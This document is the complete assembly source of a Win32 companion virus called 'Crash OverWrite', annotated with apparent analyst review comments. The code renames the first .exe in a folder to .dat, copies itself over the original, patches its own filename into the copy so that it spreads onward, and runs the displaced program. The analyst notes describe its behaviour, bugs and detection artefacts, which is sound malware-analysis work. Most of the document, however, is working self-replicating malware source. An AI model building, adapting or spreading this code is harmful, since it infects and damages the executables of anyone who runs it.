comment * Name: Crash OverWrite :-) Coder: BeLiAL This is my first win32 virus.Its only a companionvirus but it does his work very well.Its perhaps coded a bit lame but im sure nobody will care.It infects the first file in the directory and renames the victimfile to .dat .I perhaps i make it resident or infecting more file... Greetings and thanx go out to Evul,Toro,Padisah and Wallo. BeLiAL *

;-----------------------------------------------------------------------
; Analyst notes (review).  TASM-style source (Locals/Jumps, field.struct
; operands), 32-bit flat model, stdcall Win32 imports pushed right-to-left.
; Behaviour that is visible in this listing:
;   1. FindFirstFileA("*.exe") selects the first .exe in the current dir.
;   2. If its low size dword is exactly 1000h the file is treated as an
;      earlier copy of this program and control skips to reanimate.
;   3. Otherwise the victim is copied to <name>.dat, then the file named by
;      myname is copied over <name>.exe (bFailIfExists = FALSE both times).
;   4. The new <name>.exe is read into a 1000h-byte buffer, the victim's
;      name is written into that image at changeoffset (094fh), and the
;      buffer is written back from file offset 0.  The planted copy thus
;      carries its own filename in myname, so when it later runs it copies
;      itself onward and executes its own <name>.dat.
;   5. reanimate rewrites myname's ".exe" to ".dat" and runs it via WinExec,
;      so the displaced original program still executes.
; Host-side artefacts a detection or integrity rule can key on: a .exe of
; exactly 1000h bytes next to a same-named .dat, and the literal string
; '[Crash OverWrite] coded by BeLiAL'.  No API return value is checked
; except CreateFileA and GlobalAlloc.  FindNextFileA, GlobalFree and
; GetFileSize are imported but never called.
;-----------------------------------------------------------------------
.386
.model flat
Locals                                  ; TASM: enable @@-style local labels (not used below)
Jumps                                   ; TASM: extend out-of-range conditional jumps automatically
Extrn FindFirstFileA :PROC
Extrn FindNextFileA :PROC               ; imported, unused
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC                  ; imported, unused
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC                 ; imported, unused
.data
MAX_PATH EQU 0ffh                       ; 255.  NOTE(review): the Win32 MAX_PATH is 260, so the
                                        ; WIN32_FIND_DATA declared below is shorter than what
                                        ; FindFirstFileA fills in; the trailing bytes presumably
                                        ; land in memptr/counter1, which are rewritten before use
FALSE EQU 0
changeoffset EQU 094fh                  ; offset inside the 1000h-byte image where the victim's
                                        ; name is written; presumably where myname sits in the
                                        ; built binary (layout-dependent, confirm against the build)
winsize EQU 05h                         ; uCmdShow for WinExec (5 = SW_SHOW)
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct                  ; hand-declared mirror of the Win32 WIN32_FIND_DATAA
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?                    ; only this dword is used for the "already infected" test
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)          ; victim's name; also patched in place (see next_step1)
cAlternate BYTE 0eh dup(?)              ; 8.3 alternate name (14 bytes)
ends
FindFileData WIN32_FIND_DATA <>         ; filled by FindFirstFileA
memptr dd 0                             ; GlobalAlloc'd buffer holding the victim image
counter1 dd 0                           ; lpNumberOfBytesRead / lpNumberOfBytesWritten
filehandle dd 0                         ; handle returned by CreateFileA
filesize dd 00001000h                   ; bytes read and written back; same value as the size test
exefile db '*.exe',0                    ; search pattern for FindFirstFileA
myname db 'crashoverwrite.exe',0        ; source copied over the victim; rewritten to .dat and run
dd 0                                    ; at reanimate.  The two zero dwords that follow are
dd 0                                    ; presumably spare room for a longer name patched in later
secbuffer dd 0                          ; destination name for the .dat copy: 16 bytes of room.
dd 0                                    ; NOTE(review): the copy loop at find_dot2 has no length
dd 0                                    ; check, so a longer victim name runs on into the
dd 0                                    ; signature string that follows
db '[Crash OverWrite] coded by BeLiAL'  ; embedded marker string (no terminator)
.code
start:
        push    offset FindFileData
        push    offset exefile
        call    FindFirstFileA          ; FindFirstFileA("*.exe", &FindFileData); result not checked
already_infected:
        mov     eax,dword ptr nFileSizeLow.FindFileData   ; TASM field.variable notation
        cmp     eax,00001000h           ; a 1000h-byte file is assumed to be an earlier copy of this program
        je      reanimate
        mov     eax,offset cFileName.FindFileData
find_dot1:                              ; eax -> first '.' in the victim name (no end-of-string check)
        cmp     byte ptr ds:[eax],'.'
        je      next_step1
        add     eax,1
        jmp     find_dot1
next_step1:                             ; overwrite the three bytes after the dot with "dat" in place;
        add     eax,1                   ; the pointer to those bytes is kept on the stack
        push    eax
        mov     byte ptr ds:[eax],'d'
        add     eax,1
        mov     byte ptr ds:[eax],'a'
        add     eax,1
        mov     byte ptr ds:[eax],'t'
        mov     ebx,offset cFileName.FindFileData
        mov     eax,offset secbuffer
find_dot2:                              ; copy "<name>.dat" from cFileName into secbuffer
        mov     dh,byte ptr ds:[ebx]
        cmp     edx,0                   ; NOTE(review): only dh was loaded but all of edx is tested;
                                        ; nothing in this code sets the rest of edx, so the stop
                                        ; condition depends on what the preceding API call left there
        je      next_step2
        mov     byte ptr ds:[eax],dh
        add     ebx,1
        add     eax,1
        jmp     find_dot2
next_step2:
        pop     eax                     ; eax -> byte after the dot in cFileName again
        push    FALSE                   ; CopyFileA: bFailIfExists = FALSE (an existing .dat is overwritten)
        push    offset secbuffer        ; lpNewFileName = "<name>.dat"
        mov     byte ptr ds:[eax],'e'   ; restore "exe" in cFileName before using it as the source
        add     eax,1
        mov     byte ptr ds:[eax],'x'
        add     eax,1
        mov     byte ptr ds:[eax],'e'
        push    offset cFileName.FindFileData   ; lpExistingFileName = "<name>.exe"
        call    CopyFileA               ; <name>.exe -> <name>.dat
        push    FALSE
        push    offset cFileName.FindFileData
        push    offset myname
        call    CopyFileA               ; myname -> <name>.exe; neither CopyFileA result is checked
open_victim:
        push    0                       ; hTemplateFile
        push    080h                    ; FILE_ATTRIBUTE_NORMAL
        push    3h                      ; OPEN_EXISTING
        push    0h                      ; lpSecurityAttributes
        push    0h                      ; dwShareMode = 0 (exclusive)
        push    0c0000000h              ; GENERIC_READ or GENERIC_WRITE
        push    offset FindFileData.cFileName   ; the just-overwritten <name>.exe
        Call    CreateFileA
        mov     filehandle,eax
        cmp     eax,0ffffffffh          ; INVALID_HANDLE_VALUE
        je      reanimate
getmemory:
        push    filesize                ; dwBytes = 1000h
        push    0                       ; uFlags = 0 (GMEM_FIXED: the return value is a usable pointer)
        Call    GlobalAlloc             ; allocate the image buffer
        mov     edx,eax
        cmp     eax,0
        je      close_file              ; allocation failed: only close the handle
        push    edx                     ; keep the buffer pointer across ReadFile (edx is caller-saved)
copyinmemory:
        push    0                       ; lpOverlapped
        push    offset counter1         ; lpNumberOfBytesRead
        push    filesize                ; nNumberOfBytesToRead = 1000h
        push    edx                     ; lpBuffer
        push    filehandle
        Call    ReadFile                ; result and byte count are not checked
        pop     edx
        mov     dword ptr memptr,edx    ; remember the buffer for WriteFile below
        add     edx,changeoffset        ; edx -> image offset 094fh inside the buffer
        mov     eax,offset cFileName.FindFileData
modify_victim:                          ; strcpy(buffer + changeoffset, cFileName), NUL included;
        mov     bh,byte ptr ds:[eax]    ; no bound against the end of the 1000h-byte buffer
        mov     byte ptr ds:[edx],bh
        cmp     bh,0
        je      set_pointer
        add     eax,1
        add     edx,1
        jmp     modify_victim
set_pointer:
        push    0                       ; dwMoveMethod = FILE_BEGIN
        push    0                       ; lpDistanceToMoveHigh
        push    0                       ; lDistanceToMove
        push    filehandle
        call    SetFilePointer          ; rewind to offset 0
copy_to_file:
        push    0                       ; lpOverlapped
        push    offset counter1         ; lpNumberOfBytesWritten
        push    filesize                ; nNumberOfBytesToWrite = 1000h
        push    memptr                  ; lpBuffer
        push    filehandle
        call    WriteFile               ; write the patched image back in place; result not checked
close_file:
        push    filehandle
        call    CloseHandle             ; the GlobalAlloc buffer is never freed (GlobalFree is unused)
reanimate:                              ; change myname's ".e"/".E" extension to ".dat" and run it
        mov     eax,offset myname
find_dot3:
        mov     bx,word ptr ds:[eax]    ; little-endian word: 'e.' matches the byte pair ".e"
        cmp     bx,'e.'
        je      next_step3
        cmp     bx,'E.'                 ; ".E"
        je      next_step3
        add     eax,1                   ; no end-of-string check
        jmp     find_dot3
next_step3:
        add     eax,1
        mov     byte ptr ds:[eax],'d'
        add     eax,1
        mov     byte ptr ds:[eax],'a'
        add     eax,1
        mov     byte ptr ds:[eax],'t'
        add     eax,1
        mov     byte ptr ds:[eax],00h   ; "dat" is as long as "exe", so this lands on the old NUL
that_was_all:
        push    winsize                 ; uCmdShow = SW_SHOW
        push    offset myname           ; "<name>.dat"
        call    WinExec                 ; run the displaced original program
final:
        push    0
        call    ExitProcess
ends
end start